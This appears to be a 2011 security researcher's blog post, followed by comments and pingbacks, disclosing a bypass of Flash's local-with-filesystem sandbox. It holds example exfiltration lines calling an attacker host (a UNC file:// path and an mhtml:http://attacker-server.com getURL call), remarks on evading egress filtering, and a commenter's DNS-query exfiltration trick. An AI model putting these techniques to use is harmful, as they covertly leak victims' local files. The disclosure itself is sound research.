Tuesday, January 4th, 2011

Bypassing Flash’s local-with-filesystem Sandbox

A few weeks ago, I posted a description of a set of bugs that could be chained together to do “bad things”.  In the PoC I provided, a SWF file reads an arbitrary file from the victim’s local file system and passes the stolen content to an attacker’s server.

One of the readers (PZ) had a question about the SWFs local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems.  Looking at the documentation related to the sandbox, we see the following:

Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:


The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous.  SWFs loaded from the local file system do face some restrictions.  The most relevant restrictions are probably:

  1. The SWF cannot make a call to JavaScript (or vbscript), either through URL or ExternalInterface
  2. The SWF cannot call a HTTP or HTTPS request.
  3. Querystring parameters (ex. Blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)

Unfortunately, these restrictions are not the same as, “cannot communicate with the network in any way” which is what is stated in the documentation.  The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server.  For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like:  file://\\192.168.1.1\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for system on the local network (RFC 1918 addresses).  If an attacker wants to send data to a remote server on the Internet we’ll have to resort to a couple other tricks.  A while back, I put up a post on the dangers of blacklisting protocol handlers.  It’s basically impossible to create a list of “bad” protocol handlers in siutation like this.  In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists.  If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win. 

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example.  The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash.  Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

Some other benefits for using the mhtml protocol handler are:

  1. The request goes over http/https and port 80/443 so it will get past most egress filtering
  2. If the request results in a 404, it will silently fail.  The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
  3. The protocol handler is available by default on Win7 and will launch with no protocol handler warning

There you go, an easy way to bypass Flash’s local-with-file system sandbox.  Two lessons here.  One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous.  Two, protocol handler blacklists are bad.  Hope this helps PZ!

Posted by xssniper | Filed in Security


30 Responses to “Bypassing Flash’s local-with-filesystem Sandbox”

  1. January 4th, 2011 at 5:58 am

    Gareth Heyes said:

    Sweet, you are a schemer dude :D

  2. January 5th, 2011 at 7:14 am

    lava said:

    I did some work on this sometime back and also released a Whitepaper [http://www.andlabs.org/whitepapers/F_IE_PrisonBreak.pdf] and a tool which extracted files from the harddisk. But I used the more simpler method – \\192.168.1.1\stolen-data-here\

    Using mhtml is a very clever approach!

    Couple of points:
    1) This still requires the attacker to have some kind of access to the internal network since the Flash file must be loaded from within the LAN. In this case does being able to send the output to a remote system have any clear advantage?

    2) Someone who read my whitepaper sent me an e-mail mentioning that he was able to send the data to remote systems using DNS tunneling. Am wondering if this would work since you mention that only hostnames from local network can be called. Any thoughts?

    Thanks.

  3. January 5th, 2011 at 11:39 am

    HD said:

    A fun trick I use for exfiltrating data from Java is the gethostname() call. The sandbox prevents the caller from seeing the results of the lookup, but it doesn’t prevent the lookup from occurring. You can send any data you like out via DNS queries from a sandboxed Java applet. We used this in the Decloak.net code today.

  4. January 5th, 2011 at 8:50 pm

    ben said:

    I recently research some flash security,but when I public the swf to the web,it couldn’t visit local files.Could you send me the .fla?

  5. January 6th, 2011 at 7:20 am

    Flash Player sandbox can be bypassed said:

    [...] not be able to send local data to a remote server. However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as [...]

  6. January 6th, 2011 at 9:58 am

    .:: Securnetwork.net Blog – Massimo Rabbi ::. » Macromedia Flash: occhio al filesystem! said:

    [...] – Bypassing Flash’s local-with-filesystem Sandbox, sul blog di Billy (BK) Rios – Flash Player Security Basics – Security Domains, Application [...]

  7. January 6th, 2011 at 11:31 am

    Bypass Flash Player Sandbox said:

    [...] the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. [...]

  8. January 6th, 2011 at 8:56 pm

    Why Blacklist Destinations? « Aggressive Virus Defense said:

    [...] adds are easy), hard to maintain (but when should entries be removed?) measure. (See also: How Adobe blacklisted certain URL prefixes when implementing its local-with-filesystem-sandbox, but failed [...]

  9. January 7th, 2011 at 1:09 am

    Sandbox van Flash is te omzeilen. | celar.nl said:

    [...] beveiligingsonderzoeker Billy Rios heeft een prove-of-concept gepresenteerd die laat zien dat het mogelijk is om via Flash toegang te krijgen tot lokale [...]

  10. January 7th, 2011 at 6:57 am

    باحث أمني يتوصل إلى طريقة لتجاوز الـ Sandbox الخاص بـ Flash Player | المجلة التقنية said:

    [...] الباحث الأمني Billy Rios على مدونته POC)  Proof of Concept) لإمكانية تجاوز حماية الـ Sandbox التي [...]

  11. January 7th, 2011 at 1:54 pm

    Researcher breaks security sandbox in Adobe Flash bypassing security with mhtml said:

    [...] Player that's designed to harden it against hack attacks. Billy Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]

  12. January 7th, 2011 at 9:27 pm

    Information: Researcher breaks security sandbox in Adobe | DhanyWeb.com said:

    [...] Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]

  13. January 9th, 2011 at 7:57 am

    Security researcher finds way around Flash sandbox | World news said:

    [...] Rios, a researcher who is a security engineer for Microsoft, published on his personal blog a way to get around Flash Player’s local-within-filesystem [...]

  14. January 9th, 2011 at 4:12 pm

    Descubren un método para hackear archivos de Adobe Flash « Logic Security 2.0 said:

    [...] Rios, experto en seguridad informática de Microsoft, explicó en su blog los pasos necesarios para poder esquivar sandbox y desveló el método que podría permitir a los [...]

  15. January 10th, 2011 at 8:30 am

    Researcher Bypasses Flash Sandbox Security | eWEEK Europe UK said:

    [...] to application security researcher Billy Rios, there is a way to bypass the local-with-filesystem sandbox utilised in Adobe Flash [...]

  16. January 11th, 2011 at 4:32 am

    Bypass the Security Sandbox! « Domy Incorporation said:

    [...] when we try to test something locally, before upload it to the server. Anyways,  we have Mr. Billy Rios, a Security Researcher who discovered “an easy way to bypass Flash’s local-with-file [...]

  17. January 11th, 2011 at 6:17 am

    Descubierta la primera vulnerabilidad de Adobe Reader X en Bitelia (Multimedia) said:

    [...] sistema y en la implementación del sandbox para mejorar la seguridad del producto.Según publica en su blog, el experto en seguridad Billy Rios, el famoso sandbox de Adobe es vulnerable. En palabras del [...]

  18. January 11th, 2011 at 7:02 am

    Adobe Circus: Another Flash In The Pan said:

    [...] Player that’s designed to harden it against hack attacks. Billy Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]

  19. January 11th, 2011 at 8:01 am

    Descubierta la primera vulnerabilidad de Adobe Reader X « BN said:

    [...] publica en su blog, el experto en seguridad Billy Rios, el famoso sandbox de Adobe es vulnerable. En palabras del [...]

  20. January 11th, 2011 at 3:07 pm

    Исследователь взломал песочницу Adobe Flash said:

    [...] Adobe Flash Player. Билли Риос, исследователь компании Google, опубликовавший данный метод на своем собственном сайт…, сообщил, что благодаря этому методу возможно обойти [...]

  21. January 11th, 2011 at 3:19 pm

    Исследователь взломал песочницу Adobe Flash « Serval_Master said:

    [...] Adobe Flash Player. Билли Риос, исследователь компании Google, опубликовавший данный метод на своем собственном сайт…, сообщил, что благодаря этому методу возможно обойти [...]

  22. January 11th, 2011 at 10:29 pm

    Security researcher finds way around Flash sandbox | said:

    [...] Rios, a researcher who is a security engineer for Microsoft, published on his personal blog a way to get around Flash Player’s local-within-filesystem [...]

  23. January 12th, 2011 at 4:52 am

    Tom R said:

    So, er, at the moment, do you think it’s better to stick with 9.4.1 (current setup) or better to move to X? Or something else entirely?

  24. January 13th, 2011 at 4:25 pm

    IISB 01/13/2011 said:

    [...] Billy (BK) Rios » Bypassing Flash’s local-with-filesystem Sandbox [...]

  25. January 15th, 2011 at 4:00 am

    Adobe’s Flash Sandbox Not So Secure After All said:

    [...] which has been introduced in December 2010 is not as effective as it could be. Security researcher Billy Rios discovered a way to bypass Adobe’s Flash Player sandbox locally.He found out that SWFs that [...]

  26. January 15th, 2011 at 4:53 am

    superhei said:

    http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt

  27. January 17th, 2011 at 9:04 am

    Allan Smithie said:

    this is bunk

    file://\\192.168.1.1\stolen-data-here\

    and

    mhtml:http://attacker-server.com/stolen-data-here

    will throw a streamerror with or without sandbox
    with a URLRequest.

    These are just invalid urls and dont do a thing.

    and by the way the getURL method you are using is as2 and will just open a browser window which will probaly also fail to parse the urls.

    You just put some fancy security terminology together to make a blogpost.

    At least have the guts to provide us some serious sourcefiles or examplecode to look at.

  28. January 27th, 2012 at 9:08 pm

    PTSec – Portal de Segurança Português » Top Ataques Web 2011 said:

    [...] Bypassing Flash’s local-with-filesystem Sandbox [...]

  29. February 17th, 2012 at 2:22 am

    Vota por las principales técnicas de hacking web de 2011 | Sevilla Sec&Beer said:

    [...] Bypassing Flash’s local-with-filesystem Sandbox [...]

  30. February 21st, 2012 at 6:11 pm

    Top Web Hacking Techniques of 2011 | MYH3R3 said:

    [...] Bypassing Flash’s local-with-filesystem Sandbox [...]



Please leave a Comment